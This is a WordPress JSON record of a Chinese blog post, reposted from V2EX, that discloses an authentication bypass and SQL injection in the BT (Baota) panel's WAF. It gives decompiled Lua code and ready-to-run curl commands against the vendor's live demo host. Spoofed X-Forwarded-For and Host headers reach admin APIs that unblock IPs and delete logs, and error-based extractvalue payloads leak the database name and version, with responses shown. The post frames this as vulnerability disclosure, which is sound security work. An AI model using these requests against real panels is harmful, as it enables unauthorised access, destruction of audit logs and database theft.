{"id":50358,"date":"2024-02-17T13:34:13","date_gmt":"2024-02-17T05:34:13","guid":{"rendered":"http:\/\/xyryd.com\/?p=50358"},"modified":"2024-03-30T14:31:23","modified_gmt":"2024-03-30T06:31:23","slug":"20240216%e5%ae%9d%e5%a1%94%e7%9a%84-sql-%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"http:\/\/www.xyryd.com\/50358.html","title":{"rendered":"20240216\u5b9d\u5854\u9762\u677f SQL \u6ce8\u5165\u6f0f\u6d1e"},"content":{"rendered":"\n<p>\u6574\u4e2a\u5b9d\u5854 WAF \u6838\u5fc3\u9632\u62a4\u529f\u80fd\u7684\u4ee3\u7801\u5199\u7684\u786e\u5b9e\u6709\u70b9\u7c97\u7cd9\uff0c\u4ee3\u7801\u7ec4\u7ec7\u65b9\u5f0f\u4e0d\u50cf\u4e00\u4e2a\u6210\u719f\u8f6f\u4ef6\u8be5\u6709\u7684\u67b6\u6784\uff0c\u5c0f Bug \u4e00\u773c\u671b\u4e0d\u5230\u5934\uff0c\u4eca\u5929\u5206\u4eab\u7684\u662f\u4e00\u4e2a\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e\uff0c\u666e\u901a\u7528\u6237\u53ef\u4ee5\u65e0\u89c6\u5b9d\u5854\u7684\u968f\u673a\u767b\u5f55\u5730\u5740\uff0c\u65e0\u89c6\u5b9d\u5854\u7684\u767b\u5f55\u5bc6\u7801\uff0c\u76f4\u63a5\u64cd\u4f5c\u540e\u53f0\u7684\u6570\u636e\uff0c\u5b9e\u73b0\u4eba\u4eba\u90fd\u662f\u7ba1\u7406\u5458\u7684\u6548\u679c\u3002<\/p>\n\n\n\n<p>\u8bf7\u770b\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>start = function ()\n\t... \u6b64\u5904\u8eab\u7565\u82e5\u5e72\u884c\n\tif ngx.var.remote_addr == \"127.0.0.1\" and ngx.ctx.Server_name == \"127.0.0.251\" and ngx.var.host == \"127.0.0.251\" then\n\t\tif ngx.var.uri == \"\/get_btwaf_drop_ip\" then\n\t\t\tPublic.return_message(200, uv0.get_btwaf_drop_ip())\n\t\telseif ngx.var.uri == \"\/remove_btwaf_drop_ip\" then\n\t\t\tPublic.return_message(200, uv0.remove_btwaf_drop_ip())\n\t\telseif ngx.var.uri == \"\/clean_btwaf_drop_ip\" then\n\t\t\tPublic.return_message(200, uv0.clean_btwaf_drop_ip())\n\t\telseif ngx.var.uri == \"\/updateinfo\" then\n\t\t\tPublic.return_message(200, uv0.updateInfo())\n\t\telseif ngx.var.uri == \"\/get_site_status\" then\n\t\t\tPublic.return_message(200, uv0.get_site_status())\n\t\telseif ngx.var.uri == \"\/get_global_status\" then\n\t\t\tPublic.return_message(200, uv0.get_global_status())\n\t\tend\n\n\t\tif ngx.var.uri == \"\/clean_btwaf_logs\" then\n\t\t\tPublic.return_message(200, uv0.clean_btwaf_logs())\n\t\tend\n\n\t\tif ngx.var.uri == \"\/clear_speed_hit\" then\n\t\t\tPublic.return_message(200, uv0.clear_speed_hit())\n\t\tend\n\n\t\tif ngx.var.uri == \"\/clear_replace_hit\" then\n\t\t\tPublic.return_message(200, uv0.clear_replace_hit())\n\t\tend\n\n\t\tif ngx.var.uri == \"\/reset_customize_cc\" then\n\t\t\tPublic.return_message(200, uv0.reset_customize_cc())\n\t\tend\n\n\t\tif ngx.var.uri == \"\/clear_speed_countsize\" then\n\t\t\tPublic.return_message(200, uv0.clear_speed_countsize())\n\t\tend\n\tend\nend\n<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6bb5\u4ee3\u7801\u4f4d\u4e8e&nbsp;<code>\/cloud_waf\/nginx\/conf.d\/waf\/public\/waf_route.lua<\/code>&nbsp;\u6587\u4ef6\u4e2d\uff0c\u6e90\u6587\u4ef6\u662f luajit \u7f16\u8bd1\u540e\u7684\u5185\u5bb9\uff0c\u53cd\u7f16\u8bd1\u4e00\u4e0b\u5373\u53ef\u770b\u5230\u6e90\u7801\u3002<\/p>\n\n\n\n<p>\u770b\u4ee3\u7801\u6700\u5f00\u7aef\u7684 if \u8bed\u53e5\uff0c\u53ea\u8981\u6ee1\u8db3 ip \u662f 127.0.0.1 \uff0c\u57df\u540d\u662f 127.0.0.251 \u8fd9\u4e24\u4e2a\u6761\u4ef6\u5c31\u80fd\u5728\u4e0d\u7528\u767b\u5f55\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\u4e0b\u9762\u7684 API \u3002<\/p>\n\n\n\n<p>\u8bdd\u8bf4\u8fd9\u662f\u4e34\u65f6\u5de5\u5199\u7684\u4ee3\u7801\u5427\uff0c\u5bf9\u4e8e\u5b9d\u5854\u7684\u914d\u7f6e\u6765\u8bf4\uff0c\u8981\u6ee1\u8db3\u8fd9\u4e24\u4e2a\u6761\u4ef6\u5f88\u96be\u5417\uff1f<\/p>\n\n\n\n<ul>\n<li>\u914d\u7f6e x-forwarded-for \u5934\u4e3a 127.0.0.1 \u5373\u53ef\u6ee1\u8db3 ip \u662f 127.0.0.1 \u7684\u6761\u4ef6<\/li>\n\n\n\n<li>\u914d\u7f6e host \u5934\u4e3a 127.0.0.251 \u5373\u53ef\u6ee1\u8db3\u57df\u540d\u662f 127.0.0.251 \u7684\u6761\u4ef6<\/li>\n<\/ul>\n\n\n\n<p>\u63d0\u4f9b\u4e00\u6761 curl \u53c2\u6570\u4f9b\u5927\u5bb6\u53c2\u8003<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/\u5b9d\u5854\u5730\u5740\/API'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u5230\u6b64\u6f0f\u6d1e\u539f\u7406\u5c31\u8bb2\u5b8c\u4e86<\/p>\n\n\n\n<p>\u6211\u4eec\u8bbf\u95ee\u5b9d\u5854\u5b98\u65b9\u7f51\u7ad9\u505a\u4e2a\u6d4b\u8bd5<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_66_1 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title \" >\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/www.xyryd.com\/50358.html\/#get_btwaf_drop_ip\" title=\"get_btwaf_drop_ip\">get_btwaf_drop_ip<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/www.xyryd.com\/50358.html\/#remove_btwaf_drop_ip\" title=\"remove_btwaf_drop_ip\">remove_btwaf_drop_ip<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/www.xyryd.com\/50358.html\/#clean_btwaf_drop_ip\" title=\"clean_btwaf_drop_ip\">clean_btwaf_drop_ip<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/www.xyryd.com\/50358.html\/#updateinfo\" title=\"updateinfo\">updateinfo<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/www.xyryd.com\/50358.html\/#get_site_status\" title=\"get_site_status\">get_site_status<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/www.xyryd.com\/50358.html\/#clean_btwaf_logs\" title=\"clean_btwaf_logs\">clean_btwaf_logs<\/a><\/li><\/ul><\/nav><\/div>\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"get_btwaf_drop_ip\"><\/span>get_btwaf_drop_ip<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u7528\u6765\u83b7\u53d6\u5df2\u7ecf\u62c9\u9ed1\u7684 IP \u5217\u8868\uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/btwaf-demo.bt.cn\/get_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"remove_btwaf_drop_ip\"><\/span>remove_btwaf_drop_ip<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u7528\u6765\u89e3\u5c01 IP \uff0c\u63d0\u4f9b\u4e00\u4e2a get \u53c2\u6570\u5373\u53ef\uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/btwaf-demo.bt.cn\/remove_btwaf_drop_ip?ip=1.2.3.4'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"msg\":\"1.2.3.4 \u5df2\u89e3\u5c01\",\"status\":true}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"clean_btwaf_drop_ip\"><\/span>clean_btwaf_drop_ip<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u7528\u6765\u89e3\u5c01\u6240\u6709 IP \uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/btwaf-demo.bt.cn\/clean_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"msg\":\"\u5df2\u89e3\u5c01\u6240\u6709 IP\",\"status\":true}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"updateinfo\"><\/span>updateinfo<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u770b\u8d77\u6765\u662f\u66f4\u65b0\u914d\u7f6e\u7528\u7684\uff0c\u9700\u8981\u4e00\u4e2a types \u53c2\u6570\u505a\u6821\u9a8c\uff0c\u4f46\u5b9e\u9645\u5e76\u6ca1\u6709\u4ec0\u4e48\u7528\u5904\uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/btwaf-demo.bt.cn\/updateinfo?types'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"get_site_status\"><\/span>get_site_status<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u7528\u6765\u83b7\u53d6\u7f51\u7ad9\u7684\u914d\u7f6e\uff0cserver_name \u53c2\u6570\u9700\u8981\u63d0\u4f9b\u7f51\u7ad9\u7684\u57df\u540d\uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl 'http:\/\/btwaf-demo.bt.cn\/get_site_status?server_name=bt.cn'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":true,\"msg\":{\"uv\":0,\"qps\":0,\"inland\":0,\"overseas\":0,\"today\":{\"pc_count\":0,\"mobile_count\":0,\"req\":0,\"spider_google\":0,\"spider_bing\":0,\"spider_sogou\":0,\"spider_360\":0,\"spider_other\":0,\"err_40x\":0,\"spider_baidu\":0,\"recv_bytes\":0,\"send_bytes\":0,\"err_500\":0,\"err_502\":0,\"err_503\":0,\"err_504\":0,\"err_499\":0,\"uv_count\":0,\"ip_count\":0,\"pv_count\":0},\"send_bytes\":0,\"proxy_count\":0,\"err_502\":0,\"recv_bytes\":0,\"err_504\":0,\"err_499\":0,\"ip\":0,\"proxy_time\":0,\"pv\":0}}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"clean_btwaf_logs\"><\/span>clean_btwaf_logs<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u8fd9\u4e2a API \u7528\u6765\u5220\u9664\u5b9d\u5854\u7684\u6240\u6709\u65e5\u5fd7\uff0c\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u53d1\u8d77\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl \"http:\/\/btwaf-demo.bt.cn\/clean_btwaf_logs\"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u540e\u7eed\u8fd8\u6709\u4e00\u4e9b API \u5927\u540c\u5c0f\u5f02\uff0c\u4e0d\u4e00\u4e00\u5217\u4e3e\u4e86<\/p>\n\n\n\n<ul>\n<li>get_global_status<\/li>\n\n\n\n<li>clear_speed_hit<\/li>\n\n\n\n<li>clear_replace_hit<\/li>\n\n\n\n<li>reset_customize_cc<\/li>\n\n\n\n<li>clear_speed_countsize<\/li>\n<\/ul>\n\n\n\n<p>\u8bf7\u770b\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>get_site_status = function ()\n\tif not ngx.ctx.get_uri_args.server_name then\n\t\treturn Public.get_return_state(false, \"\u53c2\u6570\u9519\u8bef\")\n\tend\n\n\t... \u6b64\u5904\u7701\u7565\u82e5\u5e72\u4ee3\u7801\n\n\tslot7, slot8, slot9, slot10 = slot4.query(slot4, &#91;&#91;\nSELECT \n\t\tSUM(request) as req,\n\t\tSUM(err_40x) as err_40x,\n\t\tSUM(err_500) as err_500,\n\t\tSUM(err_502) as err_502,\n\t\tSUM(err_503) as err_503,\n\t\tSUM(err_504) as err_504,\n\t\tSUM(err_499) as err_499,\n\t\tSUM(send_bytes) as send_bytes,\n\t\tSUM(receive_bytes) as recv_bytes,\n\t\tSUM(pc_count) as pc_count,\n\t\tSUM(mobile_count) as mobile_count,\n\t\tSUM(spider_baidu) as spider_baidu,\n\t\tSUM(spider_google) as spider_google,\n\t\tSUM(spider_bing) as spider_bing,\n\t\tSUM(spider_360) as spider_360,\n\t\tSUM(spider_sogou) as spider_sogou,\n\t\tSUM(spider_other) as spider_other,\n\t\tSUM(ip_count) as ip_count,\n\t\tSUM(pv_count) as pv_count,\n\t\tSUM(uv_count) as uv_count\n\t\t FROM `request_total` WHERE `server_name`=']] .. slot1 .. \"' AND `date`='\" .. os.date(\"%Y-%m-%d\") .. \"'\")\n\n\t... \u6b64\u5904\u7701\u7565\u82e5\u5e72\u4ee3\u7801\n\n\treturn Public.get_return_state(true, slot6)\nend\n<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6bb5\u4ee3\u7801\u4f4d\u4e8e&nbsp;<code>\/cloud_waf\/nginx\/conf.d\/waf\/public\/waf_route.lua<\/code>&nbsp;\u6587\u4ef6\u4e2d\uff0c\u6e90\u6587\u4ef6\u662f luajit \u7f16\u8bd1\u540e\u7684\u5185\u5bb9\uff0c\u53cd\u7f16\u8bd1\u4e00\u4e0b\u5373\u53ef\u770b\u5230\u6e90\u7801<\/p>\n\n\n\n<p>\u8fd9\u6bb5\u903b\u8f91\u5c31\u5728\u4e0a\u6587\u63d0\u5230\u7684 get_site_status API \u4e2d\uff0cslot1 \u53d8\u91cf\u5c31\u662f server_name \u53c2\u6570\u3002\u539f\u7406\u5f88\u7b80\u5355\uff0cserver_name \u53c2\u6570\u6ca1\u6709\u505a\u4efb\u4f55\u6821\u9a8c\u5c31\u76f4\u63a5\u5e26\u5165\u4e86 SQL \u67e5\u8be2\u3002<\/p>\n\n\n\n<p>\u5b9d\u5854\u5b98\u7f51\u8fd8\u6ca1\u6709\u4fee\u590d\u8fd9\u4e2a\u95ee\u9898\uff0c\u8fd8\u662f\u62ff\u5b9d\u5854\u5b98\u7f51\u4e3a\u4f8b\uff0c\u8bd5\u8bd5\u4ee5\u4e0b\u547d\u4ee4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl \"http:\/\/btwaf-demo.bt.cn\/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'\"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":false,\"msg\":\"\u6570\u636e\u67e5\u8be2\u5931\u8d25: XPATH syntax error: '\\\\btwaf': 1105: HY000.\"}\n<\/code><\/pre>\n\n\n\n<p>\u4ece\u54cd\u5e94\u6765\u770b\u5df2\u7ecf\u6ce8\u5165\u6210\u529f\uff0c\u901a\u8fc7 updatexml \u7684\u62a5\u9519\u6210\u529f\u7684\u7206\u51fa\u4e86\u5e93\u540d\u53eb btwaf<\/p>\n\n\n\n<p>\u7ee7\u7eed\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl \"http:\/\/btwaf-demo.bt.cn\/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'\"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":false,\"msg\":\"\u6570\u636e\u67e5\u8be2\u5931\u8d25: XPATH syntax error: '\\\\8.1.0': 1105: HY000.\"}\n<\/code><\/pre>\n\n\n\n<p>\u4ece\u54cd\u5e94\u6765\u770b\uff0cmysql \u7248\u672c\u662f 8.1.0<\/p>\n\n\n\n<p>\u5728\u7ee7\u7eed\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl \"http:\/\/btwaf-demo.bt.cn\/get_site_status?server_name='-extractvalue(1,concat(0x5c,(select'hello,world')))-'\"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'\n<\/code><\/pre>\n\n\n\n<p>\u54cd\u5e94\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":false,\"msg\":\"\u6570\u636e\u67e5\u8be2\u5931\u8d25: XPATH syntax error: '\\\\hello,world': 1105: HY000.\"}\n<\/code><\/pre>\n\n\n\n<p>\u770b\u8d77\u6765 select &#8216;hello,world&#8217; \u4e5f\u6267\u884c\u6210\u529f\u4e86\uff0c\u5230\u6b64\u4e3a\u6b62\uff0c\u57fa\u672c\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>\u6f0f\u6d1e\u5df2\u901a\u62a5\u7ed9\u5b9d\u5854\u5b98\u65b9\uff0c\u6b64\u6f0f\u6d1e\u5371\u5bb3\u8f83\u5927\uff0c\u5404\u4f4d\u5b9d\u5854\u7528\u6237\u8bf7\u5173\u6ce8\u5b9d\u5854\u5b98\u65b9\u8865\u4e01\uff0c\u53ca\u65f6\u66f4\u65b0\u3002<\/p>\n\n\n\n<p>\u8f6c\u81ea\uff1a<\/p>\n\n\n\n<p>http:\/\/v2ex.com\/t\/1015932<\/p>\n\n\n\n<p>http:\/\/www.v2ex.com\/t\/1015934<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6574\u4e2a\u5b9d\u5854 WAF \u6838\u5fc3\u9632\u62a4\u529f\u80fd\u7684\u4ee3\u7801\u5199\u7684\u786e\u5b9e\u6709\u70b9\u7c97\u7cd9\uff0c\u4ee3\u7801\u7ec4\u7ec7\u65b9\u5f0f\u4e0d\u50cf\u4e00\u4e2a\u6210\u719f\u8f6f\u4ef6\u8be5\u6709\u7684\u67b6\u6784\uff0c\u5c0f Bug \u4e00\u773c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":43320,"comment_status":"open","ping_status":"closed","sticky":false,"template":"single-with-sidebar","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[343],"aioseo_notices":[],"_links":{"self":[{"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/posts\/50358"}],"collection":[{"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/comments?post=50358"}],"version-history":[{"count":1,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/posts\/50358\/revisions"}],"predecessor-version":[{"id":50645,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/posts\/50358\/revisions\/50645"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/media\/43320"}],"wp:attachment":[{"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/media?parent=50358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/categories?post=50358"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xyryd.com\/wp-json\/wp\/v2\/tags?post=50358"}],"curies":[{"name":"wp","href":"http:\/\/api.w.org\/{rel}","templated":true}]}}